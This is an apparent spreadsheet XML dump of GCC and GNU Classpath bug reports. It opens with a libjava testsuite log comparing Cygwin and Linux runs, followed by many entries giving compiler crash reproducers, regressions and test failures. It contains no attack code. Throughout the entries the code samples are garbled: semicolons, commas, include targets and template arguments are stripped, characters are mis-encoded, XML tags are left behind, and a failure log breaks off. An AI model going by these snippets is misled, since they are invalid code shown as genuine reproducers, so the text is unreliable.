Setting LD_LIBRARY_PATH to .:/opt/gcc-4_2-build/i686-pc-linux-gnu/./libjava/.libs:/opt/gcc-4_2-build/gcc:.:/opt/gcc-4_2-build/i686-pc-linux-gnu/./libjava/.libs:/opt/gcc-4_2-build/gcc:/opt/gcc-4_2-build/i686-pc-linux-gnu/libstdc++-v3/.libs:/opt/gcc-4_2-build/i686-pc-linux-gnu/libmudflap/.libs:/opt/gcc-4_2-build/i686-pc-linux-gnu/libssp/.libs:/opt/gcc-4_2-build/i686-pc-linux-gnu/libgomp/.libs:/opt/gcc-4_2-build/./gcc:/opt/gcc-4_2-build/./prev-gcc
Hello!
PASS: PR9577 output
byte compile: /opt/gcc-4_2-build/gcc/gcj -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/ -B/opt/gcc-4_2-build/gcc/ --encoding=UTF-8 -C -I/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite/../libgcj-4.2.0.jar -g /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/longfield.java -d /opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite 2&gt;@ stdout
PASS: bytecompile /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/longfield.java
When I build this on the i686-pc-cygwin target the begining of the libjava.log looks like this:
Running target unix
Using /usr/share/dejagnu/baseboards/unix.exp as board description file for target.
Using /usr/share/dejagnu/config/unix.exp as generic interface file for target.
Using /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/config/default.exp as tool-and-target-specific interface file.
Running /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/cni.exp ...
byte compile: /cygdrive/c/gcc-4_2-branch-build-9c/gcc/gcj -B/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/ -B/cygdrive/c/gcc-4_2-branch-build-9c/gcc/ --encoding=UTF-8 -C -I/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/testsuite/../libgcj-4.2.0.jar -g /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java -d /cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/testsuite 2&gt;@ stdout
PASS: bytecompile /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java
spawn /cygdrive/c/gcc-4_2-branch-build-9c/gcc/jv-scan --encoding=UTF-8 /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java --list-class 
PR9577 spawn /cygdrive/c/gcc-4_2-branch-build-9c/gcc/gcjh PR9577 
gcjh: PR9577: no such class
FAIL: PR9577 header generation
byte compile: /cygdrive/c/gcc-4_2-branch-build-9c/gcc/gcj -B/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/ -B/cygdrive/c/gcc-4_2-branch-build-9c/gcc/ --encoding=UTF-8 -C -I/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/testsuite/../libgcj-4.2.0.jar -g /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/longfield.java -d /cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/testsuite 2&gt;@ stdout
PASS: bytecompile /cygdrive/C/makecygwin/gcc-4_2-branch/libjava/testsuite/libjava.cni/longfield.java
The manner is which Java is being checked _seems_ completely different. I'm not a Java expert in fact I only know a little about it - shouldn't Java be (identical) _independant_ of the platform ?
Notice the above error for the i686-pc-cygwin target: gcjh: PR9577: no such class.
If I type this (cygwin) I get this ...
$cd /cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava/testsuite
$/cygdrive/c/gcc-4_2-branch-build-9c/gcc/gcjh PR9577
gcjh: PR9577: no such class
$ /cygdrive/c/gcc-4_2-branch-build-9c/gcc/gcjh --classpath . PR9577
(no error message)
$
If I set classpath to point to the directory that contains the PR9577.class file then gcjh runs without error. This problem with the testsuite on the Cygwin target creates many errors in the libjava section of my make -i check tests that do not occur on the Linux target.
I notice that the Linux .log shows that the test environment sets up set_ld_library_path_env_vars but that the Cygwin version of the tests do NOT. I don't know that gcjh would need the ld path to be set (though other parts of the test might need this) this _could_ be another problem. 
Perhaps the testsuite needs to set a CLASSPATH environment variable that is not shown in the .log files. If I learnt java I could be of more help :) .
During the _build_ of gcc (not the make -i check) gcjh uses these sort of commands (-d . -classpath '' -bootclasspath classpath/lib) and there are no errors but during check testing it is ran with no parameters (and complains no such class):
make[3]: Entering directory `/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava'
make create-headers
make[4]: Entering directory `/cygdrive/c/gcc-4_2-branch-build-9c/i686-pc-cygwin/libjava'
name=`echo classpath/lib/gnu/awt/LightweightRedirector.class | sed -e 's/\.class$//' -e 'sclasspath/lib/'` \
        /cygdrive/C/makecygwin/gcc-4_2-branch/mkinstalldirs `dirname $name` \
        ./../.././gcc/gcjh -d . -classpath '' -bootclasspath classpath/lib $name
mkdir -p -- gnu/awt
name=`echo classpath/lib/gnu/awt/j2d/AbstractGraphicsState.class | sed -e 's/\.class$//' -e 'sclasspath/lib/'` \
        /cygdrive/C/makecygwin/gcc-4_2-branch/mkinstalldirs `dirname $name` \
        ./../.././gcc/gcjh -d . -classpath '' -bootclasspath classpath/lib $name
I am not sufficiently familiar with Java to suggest a proper fix. I don't want to monkey with something that I don't understand - just reporting the tests are failing and the manner in which they run seems inconsistant.
When I run make -i check I get this result for Cygwin:
                === libjava Summary ===
# of expected passes            5325
# of unexpected failures        832
# of expected failures          12
# of untested testcases         823
A reasonable result (since 4.2.0 is not a release yet) but too many failures.
This problem with the testsuite compilation is also the cause of so many untested testcases.
When I run make -i check I get this result for Linux:
                === libjava Summary ===
# of expected passes            6984
# of unexpected failures        22
# of expected failures          12
# of untested testcases         8
A reasonable result (last week there were no failures).
I'll enclose the Cygwin libjava.log.</t>
  </si>
  <si>
    <t>GCC-31434</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid use of parameter pack in function arg</t>
  </si>
  <si>
    <t>More fallout from the variadic templates on mainline:
===========================================================
template void foo(const T...) {}
void bar()
{
  foo(0)
}
===========================================================
bug.cc: In function 'void foo(T ...) [with T = int]':
bug.cc:5:   instantiated from here
bug.cc:1: internal compiler error: tree check: expected tree_vec have error_mark in regenerate_decl_from_template at cp/pt.c:13791
Please submit a full bug report [etc.]
The code is (IMHO wrongfully) accepted if I replace the definition of foo by a declaration.</t>
  </si>
  <si>
    <t>GCC-27451</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE with invalid asm statement</t>
  </si>
  <si>
    <t>The following invalid testcase crashes the C++ frontend since GCC 3.4.0:
=====================
void foo()
{
  asm( ::: X)
}
=====================
bug.cc: In function 'void foo()':
bug.cc:3: error: expected string-literal before 'X'
bug.cc:3: error: expected `)' before 'X'
bug.cc:3: internal compiler error: tree check: expected string_cst have error_mark in expand_asm_operands at stmt.c:696
Please submit a full bug report [etc.]
The C frontend is not affected.</t>
  </si>
  <si>
    <t>GCC-59759</t>
  </si>
  <si>
    <t>internal compiler error: in unify using std::enable_if on classes</t>
  </si>
  <si>
    <t>Created attachment 31798
Source code
Im using gcc version 4.8.2 20131219 (prerelease) (GCC) on arch linux.
When the attached file is compiled with g++ Test_GCC.cpp -std=c++11 it crashes with the following output:
Test_GCC.cpp: In function â€˜int main()â€™:
Test_GCC.cpp:21:7: internal compiler error: in unify at cp/pt.c:17171
  f(map)
       ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>gereon.kremer</t>
  </si>
  <si>
    <t>GCC-57442</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in appears_later_in_bb at tree-ssa-reassoc.c:2891</t>
  </si>
  <si>
    <t>Hello !
Using GCC 4.9.0 as of 20130528 (on a x86_64 box) :
$ cat reassoc.c
short a
unsigned b
long c
int d
void f(void)
{
    b = a ? : (a = b) - c + (d - (b + b))
}
$ xgcc -O1 reassoc.c
reassoc.c: In function â€˜fâ€™:
reassoc.c:6:6: internal compiler error: in appears_later_in_bb at 
tree-ssa-reassoc.c:2891
 void f(void)
      ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-282</t>
  </si>
  <si>
    <t>internal compiler error on #pragma implemention or #pragma interface</t>
  </si>
  <si>
    <t>I get a internal compiler error building most of libstdc++. It
occurs whenever it encounters a #pragma interface or implementation.
rest of gcc builds and works ok though but can't deploy
it without libstdc++.
Release:
20000530
Environment:
hpux 11 possibly irix 6.5hpux10solaris26</t>
  </si>
  <si>
    <t>GCC-51028</t>
  </si>
  <si>
    <t>[C++0x] Alias-Declaration in namespace omits other whole code</t>
  </si>
  <si>
    <t>testcase:
// test.cc
namespace {
	using int_x = int
}
int main() { }
$ g++ -std=c++11 test.cc
/usr/lib/x86_64-linux-gnu/crt1.o: In function `_start':
(.text+0x20): undefined reference to `main'
collect2: error: ld returned 1 exit status
$ g++ -std=c++11 test.cc -c
(no message)
$ nm test.o
(no message)</t>
  </si>
  <si>
    <t>kikairoya</t>
  </si>
  <si>
    <t>GCC-31426</t>
  </si>
  <si>
    <t>TR1 includes do not work with -std=c++0x</t>
  </si>
  <si>
    <t>When the compiler is provided with -std=c++0x to enable the experimental C++0x mode includes of TR1 facilities (e.g. tr1/tuple) do not put TR1 functionality into namespace std::tr1 breaking backward compatibility. Here's an example program that compiles without -std=c++0x but does not compile with it:
#include 
int main()
{
  std::tr1::tuple x(17 3.14)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-81747</t>
  </si>
  <si>
    <t>[8 Regression] ICE in operator[] at vec.h:749</t>
  </si>
  <si>
    <t>At least gcc-8.0.0-alpha20170730 and gcc-8.0.0-alpha20170806 snapshots ICE when compiling the following snippet w/ -O2 (-O3 -Ofast) -funroll-loops:
int
ij (int pu int x5)
{
  int u7 = 3
  unsigned int fa
  for (fa = 533090919 fa &lt; 1 ++fa)
    {
      pu = 1
      while (pu != 0)
      {
 ed:
        u7 %= 1
      }
    }
  if (x5 &lt; 1)
    {
      if (fa != 3062256262 &amp;&amp; u7 != 0)
        goto ed
      return x5
    }
}
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20170806 -O2 -funroll-loops -c -w whfolj7o.c   
during RTL pass: cse2
whfolj7o.c: In function 'ij':
whfolj7o.c:23:1: internal compiler error: in operator[] at vec.h:749
 }
 ^
0x135560c vec::operator[](unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170806/work/gcc-8-20170806/gcc/vec.h:749
0x135560c cse_find_path
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170806/work/gcc-8-20170806/gcc/cse.c:6333
0x135560c cse_main
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170806/work/gcc-8-20170806/gcc/cse.c:6729
0x13557a6 rest_of_handle_cse2
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170806/work/gcc-8-20170806/gcc/cse.c:7632
0x13557a6 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170806/work/gcc-8-20170806/gcc/cse.c:7685</t>
  </si>
  <si>
    <t>GCC-81878</t>
  </si>
  <si>
    <t>--disable-bootstrap --enable-languages=ada fails</t>
  </si>
  <si>
    <t>The ada tools build requires ../../xg++ which isn't there.  I suppose some automatic language enablement is missing (usually C++ is a bootstrap language).  This also means an Ada cross requires a C++ target compiler!?
Eventually the above xg++ should be really the host C++ compiler?</t>
  </si>
  <si>
    <t>GCC-66723</t>
  </si>
  <si>
    <t>gcc.target/i386/vararg-loc.c FAILs</t>
  </si>
  <si>
    <t>The new gcc.target/i386/vararg-loc.c FAILs on Solaris/x86 when configured to used
/usr/ccs/bin/as and Mac OS X with the native assembler:
FAIL: gcc.target/i386/vararg-loc.c scan-assembler-times \\\\.loc 1 18 0 1
FAIL: gcc.target/i386/vararg-loc.c scan-assembler-times \\\\.loc 1 20 0 1
.loc support seems to be a gas-only feature currently.
  Rainer</t>
  </si>
  <si>
    <t>GCC-53589</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE in maybe_record_trace_start with asm goto</t>
  </si>
  <si>
    <t>extern void foo (void) __attribute__ ((__noreturn__))
void
bar (int x)
{
  if (x &lt; 0)
    foo ()
  if (x == 0)
    return
  __asm goto ( : : : : lab)
lab:
}
ICEs on x86_64-linux:
LC_ALL=C ./cc1 -O2 rh829247.c -quiet
rh829247.c: In function 'bar':
rh829247.c:12:1: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2193
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The problem is that we end up with asm goto that branches to the fallthru label and shrink-wrapping wants to redirect the edge but leaves broken CFG around.</t>
  </si>
  <si>
    <t>GCC-52302</t>
  </si>
  <si>
    <t>[4.6.2] cc1plus.exe hungs when compiling</t>
  </si>
  <si>
    <t>trying to compile this code cc1plus hungs and when debugging in Visual Studio debugger catches stackoverflow exception.
gcc 4.6.2
cpp.cpp:
#include 
#include 
void open(std::function callback)
{
	callback()
}
void read(std::function callback)
{
	auto opencb = ([&amp;]()
	{
		int x = 0
		return [=]() mutable {
			x++ 
			callback()
		}
	})()
	open(opencb)
}
int main(int argc char **argv)
{
	read([]() {})
	return 0
}
command line:
&gt;g++ -c cpp.cpp -g -Wall -Wextra -std=c++0x -o cpp.o</t>
  </si>
  <si>
    <t>xnko</t>
  </si>
  <si>
    <t>CLASSPATH-28534</t>
  </si>
  <si>
    <t>Regression in javax.swing.JTree</t>
  </si>
  <si>
    <t>The attached code snippet returns null with current CVS HEAD but returns a CellRenderer when run against 0.91.  This regression prevents Varsha (http://varsha.sourceforge.net/) from running.</t>
  </si>
  <si>
    <t>GCC-17653</t>
  </si>
  <si>
    <t>different parameter passing methods not checked on function pointer assignments</t>
  </si>
  <si>
    <t>In order to help the developer checks for attribute consistency respective
regparm stdcall or fastcall (for i386 for other architectures this would
apply similarly if they support attributes of similar functionality) should be
added. Identically this would be good for architecture-independent function
attributes like pure. Specifically the example below should not compile without
any diagnostic:
typedef __attribute__((__regparm__(0))) int noregs_t(int int)
typedef __attribute__((__regparm__(1))) int onereg_t(int int)
typedef __attribute__((__regparm__(2))) int tworegs_t(int int)
noregs_t noregs
onereg_t onereg
tworegs_t tworegs
noregs_t*noregs_a[] = {noregs onereg tworegs}
onereg_t*onereg_a[] = {noregs onereg tworegs}
tworegs_t*tworegs_a[] = {noregs onereg tworegs}
int test(int i int x int y) {
	return noregs_a[i](x y) * -onereg_a[i](x y) + tworegs_a[i](x y)
}</t>
  </si>
  <si>
    <t>GCC-63885</t>
  </si>
  <si>
    <t>[5 Regression] ICE in static assert of constexpr forwarding xvalue container member rvalue reference</t>
  </si>
  <si>
    <t>Created attachment 33983
preprocessed source file
Internal compiler error in static assert of constexpr forwarding xvalue container member rvalue reference. 
g++ 4.8 and 4.9 passes but trunk built from r217559 on ubuntu 14.04 fails compilation with
$ g++-trunk -std=c++11 -Wall -Wextra constexpr_static_assert.ii
constexpr_static_assert.cpp:50:39:   in constexpr expansion of â€˜get &gt;((* &amp; S((* &amp;1))))â€™
constexpr_static_assert.cpp:35:35:   in constexpr expansion of â€˜__get::value&amp;&amp;&gt;((* &amp; std::forward &gt;((* &amp; arg))))â€™
constexpr_static_assert.cpp:50:44: internal compiler error: in verify_ctor_sanity at cp/constexpr.c:1779
 static_assert (get  (S &lt;int  // g++ 4.9 passes g++ trunk r217559 fails
...
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
//
// source
//
#include 
using namespace std
///////////////////////////////////////////////////////////////////////////////
template  struct member_forward
{
    typedef typename remove_reference ::type::type T
    typedef typename conditional
    &lt;
        is_lvalue_reference ::value &amp;&amp; not is_reference ::value
        typename add_lvalue_reference ::type
        T
    &gt;::type type
}
template  using member_forward_t = typename member_forward ::type
///////////////////////////////////////////////////////////////////////////////
template  struct __get
template  struct __get  
{ 
    constexpr static auto value (T arg) 
     -&gt; decltype ((forward &gt; (arg.t))) 
    {  
        return     forward &gt; (arg.t) 
    } 
}
template  constexpr auto get (T &amp;&amp; arg)
 -&gt; decltype (__get ::value (forward  (arg)))
{
    return    __get &lt;N T 
}
///////////////////////////////////////////////////////////////////////////////
template  struct S
{
    typedef T type
    T t
    template  constexpr S (U &amp;&amp; u) : t (forward  (u)) {} 
}
///////////////////////////////////////////////////////////////////////////////
static_assert (get  (S &lt;int  // g++ 4.9 passes g++ trunk r217559 fails
int main () {}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////</t>
  </si>
  <si>
    <t>listcrawler</t>
  </si>
  <si>
    <t>GCC-725</t>
  </si>
  <si>
    <t>Compiling the file submitted in the attachment yields an internal 
compiler error.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Solaris 2.6 (SPARC)</t>
  </si>
  <si>
    <t>rovf</t>
  </si>
  <si>
    <t>GCC-53763</t>
  </si>
  <si>
    <t>Missing error check on decltype when used within variadic template argument list</t>
  </si>
  <si>
    <t>In the example below which is invalid code no appropriate compiler error is reported. The code is wrong because decltype(A::a(2)) is invalid as A is a template class and would need template arguments. 
The compiler seams to silently skip the function call to B::b as if it was not there (it produces only a message for the first call of b). The only thing that is reported though is that y is used uninitialized. Apparently a later stage knows that the function was not called.
It seems necessary that B takes a variadic template argument list for the problem to appear but I couldn't nail it down further.
--- compiler output ---
&gt; g++ -Wall -std=c++11 example.c
example.c: In function â€˜int main()â€™:
example.c:26:12: warning: â€˜yâ€™ is used uninitialized in this function [-Wuninitialized]
--- example.cxx ---
#include
template
struct A
{
  static int a(TYPE value)
  {
    return value
  }
}
template
struct B
{
  static int b(ARGS... args)
  {
    printf(hello world %i\nargs...)
    return 0
  }
}
int main()
{
  int x = B::a(1))&gt;::b(A::a(1))
  int y = B::b(A::a(2))
  return x+y
}</t>
  </si>
  <si>
    <t>o.mangold</t>
  </si>
  <si>
    <t>GCC-41635</t>
  </si>
  <si>
    <t>inappropriate assertion that fopen succeeds</t>
  </si>
  <si>
    <t>As noted in my review of the LTO front end
      resolution = fopen (resolution_file_name r)
      gcc_assert (resolution != NULL)
is not an appropriate use of an assertion because the fopen could
fail through system resource exhaustion even if you know the file
exists and is readable and has proper contents.  A normal error or
fatal error needs to be given instead.</t>
  </si>
  <si>
    <t>GCC-2267</t>
  </si>
  <si>
    <t>the following program fails to compile and produces an internal compiler error.</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
unknown
Environment:
Linux parth 2.4.2 #1 Sun Feb 25 06:35:32 PST 2001 i686 unknown
How-To-Repeat:
g++ -Wall smart_pointer_conversion_policy.cc   -o smart_pointer_conversion_policy</t>
  </si>
  <si>
    <t>anupam.kapoor</t>
  </si>
  <si>
    <t>GCC-149</t>
  </si>
  <si>
    <t>dead code elim &amp;&amp; div-by-0 warnings</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Tue 28 Mar 2000 01:26:11 +0000
 Couple of things..
 foo()
 {
	 if (0)
		 bar(string)
 }
 will still put string into the output although it is unreferenced.
Release:
2.95.2</t>
  </si>
  <si>
    <t>CLASSPATH-22833</t>
  </si>
  <si>
    <t>[swing] UIDefaults.put should allow 'null'</t>
  </si>
  <si>
    <t>doing a put like this:
myDefaults.put(foo null)
is a legal option and should do a remove with that value instead.</t>
  </si>
  <si>
    <t>CLASSPATH-22933</t>
  </si>
  <si>
    <t>CVS dirs in resource subdirectories in release tar.gz file</t>
  </si>
  <si>
    <t>The following directories should not be in the relase tar.gz file:
./resource/CVS
./resource/gnu/CVS
./resource/gnu/java/CVS
./resource/gnu/java/awt/CVS
./resource/gnu/java/awt/peer/CVS
./resource/gnu/java/awt/peer/gtk/CVS
./resource/gnu/regexp/CVS
./resource/java/CVS
./resource/java/security/CVS
./resource/java/util/CVS
./resource/java/util/logging/CVS
./resource/org/CVS
./resource/org/ietf/CVS
./resource/org/ietf/jgss/CVS
This was the case with the classpath-0.15.tar.gz release.</t>
  </si>
  <si>
    <t>GCC-48993</t>
  </si>
  <si>
    <t>[C++0x] segmentation fault when compiling this program with constexpr</t>
  </si>
  <si>
    <t>Created attachment 24245
source code
linux version (uname -a):
Linux localhost.localdomain 2.6.38.2-9.fc15.i686.PAE #1 SMP Wed Mar 30 16:47:28 UTC 2011 i686 i686 i386 GNU/Linux
gcc version 4.6.0 20110428 (Red Hat 4.6.0-6) (GCC) 
(this is the default that was shipped with the beta version of fedora 15)
I compile the attached file using command:
g++ bug.cpp -std=c++0x
The response I get is:
bug.cpp:12:17:   in constexpr expansion of â€˜s1.Stack::Stack((*(const Stack*)(&amp; s)) 10)â€™
bug.cpp:12:17: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccIWdWoz.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>akrzemi1</t>
  </si>
  <si>
    <t>GCC-27093</t>
  </si>
  <si>
    <t>[4.2 Regression] verify_ssa failed: definition does not dominate use</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/361591 ]
falk@juist:/tmp% cat 309.c           
struct mark_entry { int num }
void *t1(void)
int t2(int*)
void t3(int)
void g(void)
static void *f(void) {
    if (t1())
        return 0    
    void *seen_numbers = 0
    int bytes_left
    if (t2(&amp;bytes_left)) {
        if (bytes_left) {
            struct mark_entry *entry = t1()
            seen_numbers = t1()
            while (bytes_left) {
                t3(entry-&gt;num)
                entry++
            }
        }
        t1()
    }
    return seen_numbers
}
void g(void) {
    void *seen_numbers = f()
    if (!seen_numbers)
        t1()    
}
falk@juist:/tmp% gcc -O -c 309.c     
falk@juist:/tmp% gcc -O2 -c 309.c 
309.c: In function 'g':
309.c:26: error: definition in block 8 does not dominate use in block 11
for SSA_NAME: SMT.5_37 in statement:
SMT.5_20 = PHI 
PHI argument
SMT.5_37
for PHI node
SMT.5_20 = PHI 
309.c:26: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I don't have 4.1 or earlier with checking enabled so I cannot check 
whether the problem is present there.
    Falk</t>
  </si>
  <si>
    <t>GCC-61866</t>
  </si>
  <si>
    <t>FAIL: ./index0-out.go execution  -O0 -g -fno-var-tracking-assignments</t>
  </si>
  <si>
    <t>index0-out.go fails execution with -O0 -g -fno-var-tracking-assignments on 32bit x86 target (Fedora 20) with:
BUG
./index0-out.go:113: ai[i64bigger] did not panic
./index0-out.go:113: ai[i64bigger:] did not panic
./index0-out.go:113: ai[ni64bigger] did not panic
./index0-out.go:113: ai[ni64bigger:] did not panic
./index0-out.go:113: ai[nhuge] did not panic
./index0-out.go:113: ai[nhuge:] did not panic
./index0-out.go:113: aib[i64bigger] did not panic
./index0-out.go:113: aib[i64bigger:] did not panic
./index0-out.go:113: aib[ni64bigger] did not panic
./index0-out.go:113: aib[ni64bigger:] did not panic
./index0-out.go:113: aib[nhuge] did not panic
./index0-out.go:113: aib[nhuge:] did not panic
./index0-out.go:113: aq[i64bigger] did not panic
./index0-out.go:113: aq[i64bigger:] did not panic
./index0-out.go:113: aq[ni64bigger] did not panic
./index0-out.go:113: aq[ni64bigger:] did not panic
./index0-out.go:113: aq[nhuge] did not panic
./index0-out.go:113: aq[nhuge:] did not panic
./index0-out.go:113: aqb[i64bigger] did not panic
./index0-out.go:113: aqb[i64bigger:] did not panic
./index0-out.go:113: aqb[ni64bigger] did not panic
./index0-out.go:113: aqb[ni64bigger:] did not panic
./index0-out.go:113: aqb[nhuge] did not panic
./index0-out.go:113: aqb[nhuge:] did not panic
./index0-out.go:113: pai[i64bigger] did not panic
./index0-out.go:113: pai[i64bigger:] did not panic
./index0-out.go:113: pai[ni64bigger] did not panic
./index0-out.go:113: pai[ni64bigger:] did not panic
./index0-out.go:113: pai[nhuge] did not panic
./index0-out.go:113: pai[nhuge:] did not panic
./index0-out.go:113: paib[i64bigger] did not panic
./index0-out.go:113: paib[i64bigger:] did not panic
./index0-out.go:113: paib[ni64bigger] did not panic
./index0-out.go:113: paib[ni64bigger:] did not panic
./index0-out.go:113: paib[nhuge] did not panic
./index0-out.go:113: paib[nhuge:] did not panic
./index0-out.go:113: paq[i64bigger] did not panic
./index0-out.go:113: paq[i64bigger:] did not panic
./index0-out.go:113: paq[ni64bigger] did not panic
./index0-out.go:113: paq[ni64bigger:] did not panic
./index0-out.go:113: paq[nhuge] did not panic
./index0-out.go:113: paq[nhuge:] did not panic
./index0-out.go:113: paqb[i64bigger] did not panic
./index0-out.go:113: paqb[i64bigger:] did not panic
./index0-out.go:113: paqb[ni64bigger] did not panic
./index0-out.go:113: paqb[ni64bigger:] did not panic
./index0-out.go:113: paqb[nhuge] did not panic
./index0-out.go:113: paqb[nhuge:] did not panic
./index0-out.go:113: si[i64bigger] did not panic
./index0-out.go:113: si[i64bigger:] did not panic
./index0-out.go:113: si[ni64bigger] did not panic
./index0-out.go:113: si[ni64bigger:] did not panic
./index0-out.go:113: si[nhuge] did not panic
./index0-out.go:113: si[nhuge:] did not panic
./index0-out.go:113: sib[i64bigger] did not panic
./index0-out.go:113: sib[i64bigger:] did not panic
./index0-out.go:113: sib[ni64bigger] did not panic
./index0-out.go:113: sib[ni64bigger:] did not panic
./index0-out.go:113: sib[nhuge] did not panic
./index0-out.go:113: sib[nhuge:] did not panic
./index0-out.go:113: sq[i64bigger] did not panic
./index0-out.go:113: sq[i64bigger:] did not panic
./index0-out.go:113: sq[ni64bigger] did not panic
./index0-out.go:113: sq[ni64bigger:] did not panic
./index0-out.go:113: sq[nhuge] did not panic
./index0-out.go:113: sq[nhuge:] did not panic
./index0-out.go:113: sqb[i64bigger] did not panic
./index0-out.go:113: sqb[i64bigger:] did not panic
./index0-out.go:113: sqb[ni64bigger] did not panic
./index0-out.go:113: sqb[ni64bigger:] did not panic
./index0-out.go:113: sqb[nhuge] did not panic
./index0-out.go:113: sqb[nhuge:] did not panic
./index0-out.go:113: t.ai[i64bigger] did not panic
./index0-out.go:113: t.ai[i64bigger:] did not panic
./index0-out.go:113: t.ai[ni64bigger] did not panic
./index0-out.go:113: t.ai[ni64bigger:] did not panic
./index0-out.go:113: t.ai[nhuge] did not panic
./index0-out.go:113: t.ai[nhuge:] did not panic
./index0-out.go:113: t.aib[i64bigger] did not panic
./index0-out.go:113: t.aib[i64bigger:] did not panic
./index0-out.go:113: t.aib[ni64bigger] did not panic
./index0-out.go:113: t.aib[ni64bigger:] did not panic
./index0-out.go:113: t.aib[nhuge] did not panic
./index0-out.go:113: t.aib[nhuge:] did not panic
./index0-out.go:113: t.aq[i64bigger] did not panic
./index0-out.go:113: t.aq[i64bigger:] did not panic
./index0-out.go:113: t.aq[ni64bigger] did not panic
./index0-out.go:113: t.aq[ni64bigger:] did not panic
./index0-out.go:113: t.aq[nhuge] did not panic
./index0-out.go:113: t.aq[nhuge:] did not panic
./index0-out.go:113: t.aqb[i64bigger] did not panic
./index0-out.go:113: t.aqb[i64bigger:] did not panic
./index0-out.go:113: t.aqb[ni64bigger] did not panic
./index0-out.go:113: t.aqb[ni64bigger:] did not panic
./index0-out.go:113: t.aqb[nhuge] did not panic
./index0-out.go:113: t.aqb[nhuge:] did not panic
./index0-out.go:113: t.pai[i64bigger] did not panic
./index0-out.go:113: t.pai[i64bigger:] did not panic
./index0-out.go:113: t.pai[ni64bigger] did not panic
./index0-out.go:113: t.pai[ni64bigger:] did not panic
./index0-out.go:113: t.pai[nhuge] did not panic
./index0-out.go:113: t.pai[nhuge:] did not panic
./index0-out.go:113: t.paib[i64bigger] did not panic
./index0-out.go:113: t.paib[i64bigger:] did not panic
./index0-out.go:113: t.paib[ni64bigger] did not panic
./index0-out.go:113: t.paib[ni64bigger:] did not panic
./index0-out.go:113: t.paib[nhuge] did not panic
./index0-out.go:113: t.paib[nhuge:] did not panic
./index0-out.go:113: t.paq[i64bigger] did not panic
./index0-out.go:113: t.paq[i64bigger:] did not panic
./index0-out.go:113: t.paq[ni64bigger] did not panic
./index0-out.go:113: t.paq[ni64bigger:] did not panic
./index0-out.go:113: t.paq[nhuge] did not panic
./index0-out.go:113: t.paq[nhuge:] did not panic
./index0-out.go:113: t.paqb[i64bigger] did not panic
./index0-out.go:113: t.paqb[i64bigger:] did not panic
./index0-out.go:113: t.paqb[ni64bigger] did not panic
./index0-out.go:113: t.paqb[ni64bigger:] did not panic
./index0-out.go:113: t.paqb[nhuge] did not panic
./index0-out.go:113: t.paqb[nhuge:] did not panic
./index0-out.go:113: t.si[i64bigger] did not panic
./index0-out.go:113: t.si[i64bigger:] did not panic
./index0-out.go:113: t.si[ni64bigger] did not panic
./index0-out.go:113: t.si[ni64bigger:] did not panic
./index0-out.go:113: t.si[nhuge] did not panic
./index0-out.go:113: t.si[nhuge:] did not panic
./index0-out.go:113: t.sib[i64bigger] did not panic
./index0-out.go:113: t.sib[i64bigger:] did not panic
./index0-out.go:113: t.sib[ni64bigger] did not panic
./index0-out.go:113: t.sib[ni64bigger:] did not panic
./index0-out.go:113: t.sib[nhuge] did not panic
./index0-out.go:113: t.sib[nhuge:] did not panic
./index0-out.go:113: t.sq[i64bigger] did not panic
./index0-out.go:113: t.sq[i64bigger:] did not panic
./index0-out.go:113: t.sq[ni64bigger] did not panic
./index0-out.go:113: t.sq[ni64bigger:] did not panic
./index0-out.go:113: t.sq[nhuge] did not panic
./index0-out.go:113: t.sq[nhuge:] did not panic
./index0-out.go:113: t.sqb[i64bigger] did not panic
